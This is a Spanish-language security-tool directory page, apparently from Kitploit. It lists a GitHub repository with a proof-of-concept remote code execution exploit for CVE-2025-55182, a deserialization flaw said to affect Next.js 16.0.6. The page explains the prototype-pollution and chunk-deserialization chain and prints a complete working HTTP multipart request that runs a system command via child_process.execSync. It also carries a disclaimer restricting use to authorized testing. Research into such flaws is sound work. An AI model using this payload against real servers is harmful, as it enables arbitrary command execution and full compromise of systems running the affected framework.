Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-RCE-Exploit — Más enfocado en exploits; ideal para repositorios de investigación en seguridad. | Kitploit
Herramientas/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y EducaciónDesarrollo de Payloads
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

Más enfocado en exploits; ideal para repositorios de investigación en seguridad.

Ver Repositorio
4hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC para CVE-2025-55182 – Ejecución Remota de Código en Next.js 16.0.6

Este repositorio contiene un proof-of-concept (POC) funcional para CVE-2025-55182, una vulnerabilidad crítica de deserialización que afecta a Next.js 16.0.6. El exploit abusa de la deserialización de chunks $@ y de Chunk.prototype.then para obtener control total sobre el proceso de resolución de chunks y lograr ejecución arbitraria de código (RCE) en el servidor.

Resumen de la Vulnerabilidad

Next.js utiliza objetos Chunk internos y un mecanismo de streaming/deserialización para las acciones del servidor. Abusando de $@ para deserializar una referencia de Chunk e inyectando Chunk.prototype.then en el objeto raíz, un atacante puede:

  • Forzar a Next.js a llamar a then(...) con un this controlado por el atacante
  • Establecer el status del chunk en resolved_model
  • Desencadenar initializeModelChunk con un chunk falso completamente controlado por el atacante
  • Abusar de los métodos chunk._response para alcanzar comportamientos internos peligrosos

El objetivo final es desencadenar la deserialización de Blob, que ejecuta una llamada como:

response._formData.get(response._prefix)

Al establecer response._formData.get = Function y colocar código arbitrario en response._prefix, el atacante puede ejecutar comandos arbitrarios del sistema.

POC del Exploit

La solicitud HTTP en poc/CVE-2025-55182.http demuestra el exploit contra Next.js 16.0.6 ejecutándose localmente, lanzando xcalc mediante child_process.execSync:

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Estructura del Repositorio

/
├── README.md
├── DISCLAIMER.md
├── poc/
│   └── CVE-2025-55182.http
└── analysis/
    └── exploitation-notes.md

Descargo de responsabilidad

Este proyecto se proporciona estrictamente solo con fines educativos y de investigación. NO use este exploit en ningún sistema que no posea o para el que no tenga permiso explícito por escrito para realizar pruebas.

El autor no asume ninguna responsabilidad por cualquier uso indebido o daño causado.

Descargar herramienta